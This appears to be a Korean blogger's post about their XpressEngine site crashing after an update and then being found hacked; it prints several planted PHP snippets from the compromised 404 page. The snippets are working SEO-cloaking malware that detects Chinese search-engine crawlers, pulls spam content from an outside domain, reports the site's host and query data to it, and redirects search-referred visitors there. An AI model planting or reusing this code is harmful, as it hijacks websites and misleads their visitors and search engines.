우린친구닷컴 홈페이지 갑자기 다운됨.

 

 

상세 설명

XpressEngine Core 1.11.6 버전을 배포합니다.

 

이 버전에서는 보안취약점을 고쳤으니 모든 운영 중인 웹사이트에 업데이트를 권장합니다.

 

서버의 PHP 7.2 업그레이드 시 주의 사항

이 배포본에서는 PHP 7.2에 대한 호환성 문제를 고쳤으나,

PHP 7.2 이상의 환경에서는 PHP 7.2에 대응하지 않은 확장 기능 사용시에 문제를 겪을 수 있으므로

PHP 7.2 이상에서는 확장 기능 사용 시 주의 하시기 바랍니다.

 

관련 정보는 https://www.xpressengine.com/devlog/23249915 에서 찾아볼 수 있습니다.

 

 

1.11.6 사용시 먹통

1.11.2 다운그레이드 후 정상

 

더불어 해킹까지 당한 것 같다.

 

404 페이지가 이렇게 작성되어 있다.

 

이것 외에도 몇가지가 더 있던데 어떻게 이런일이??

 

 

<?php

header('Content-Type:text/html;charset=gb2312');

$key= $_SERVER["HTTP_USER_AGENT"];

if(strpos($key,strtolower('HaosouSpider'))!== false||strpos($key,strtolower('baidu'))!== false||strpos($key,strtolower('Yisou'))!== false||strpos($key,strtolower('Sogou'))!== false||strpos($key,strtolower('YisouSpider'))!== false||strpos($key,strtolower('360Spider'))!== false||strpos($key,strtolower('Baiduspide'))!== false||strpos($key,strtolower('Soso'))!== false )

{

date_default_timezone_set('PRC');

$TD_server = "http://www1.asdasdasdasd.club/"; 

$host_name = "http://".$_SERVER['HTTP_HOST'].$_SERVER['PHP_SELF'];

$Content_mb=file_get_contents($TD_server."/index.php?host=".$host_name."&url=".$_SERVER['QUERY_STRING']."&domain=".$_SERVER['SERVER_NAME']);

 

echo $Content_mb;

}

 

$httpuser=strtolower($_SERVER['HTTP_REFERER']);

if(strstr($httpuser,'sogou') or strstr($httpuser,'baidu') or strstr($httpuser,'HaosouSpider') or strstr($httpuser,'YisouSpider'))

 

{

 

Header("Location: http://www1.asdasdasdasd.club/");//寧땍契瘻

 

exit; 

 

}

?>

//////////////////////////////

<?php

header('Content-Type:text/html;charset=gb2312');

$key= $_SERVER["HTTP_USER_AGENT"];

if(strpos($key,strtolower('HaosouSpider'))!== false||strpos($key,strtolower('baidu'))!== false||strpos($key,strtolower('Yisou'))!== false||strpos($key,strtolower('Sogou'))!== false||strpos($key,strtolower('YisouSpider'))!== false||strpos($key,strtolower('360Spider'))!== false||strpos($key,strtolower('Baiduspide'))!== false||strpos($key,strtolower('Soso'))!== false )

{

date_default_timezone_set('PRC');

$TD_server = "http://www1.asdasdasdasd.club/"; 

$host_name = "http://".$_SERVER['HTTP_HOST'].$_SERVER['PHP_SELF'];

$Content_mb=file_get_contents($TD_server."/index.php?host=".$host_name."&url=".$_SERVER['QUERY_STRING']."&domain=".$_SERVER['SERVER_NAME']);

 

echo $Content_mb;

}

 

 

?>

 

---

 

<?php

function chkCode($string) {

$code = array(

 'ASCII',

 'GBK',

 'UTF-8'

);

foreach ($code as $c) { if ($string === iconv('UTF-8', $c, iconv($c, 'UTF-8', $string))) {return $c;}}

}

$key= strtolower($_SERVER["HTTP_USER_AGENT"]);

if(stristr($key,'baidu')!=false ||  stristr($key,'sogou')!=false || stristr($key,'youdao')!=false  || stristr($key,'360')!=false  || stristr($key,'soso')!=false  )

{

set_time_limit(0);

$content=file_get_contents(__FILE__);

if(stristr(__FILE__,"index.html")!=false){

preg_match("/<meta.+?charset=([-\w]+)/i",$content,$charset);

$charset=strtolower($charset[1]);

}else{

if(@chkCode($content)=='UTF-8'){

$charset="utf-8";

}else{

$charset="gbk";

}

}

header("Content-Type: text/html;charset=".$charset);

 

date_default_timezone_set('PRC');

$u='www1.asdasdasdasd.club';if($charset=='utf-8'){

echo iconv("gb2312","utf-8//IGNORE",file_get_contents('http://'.$u.'/'));

}else{

echo file_get_contents("http://www1.asdasdasdasd.club/?".rand(time()));

}

}?>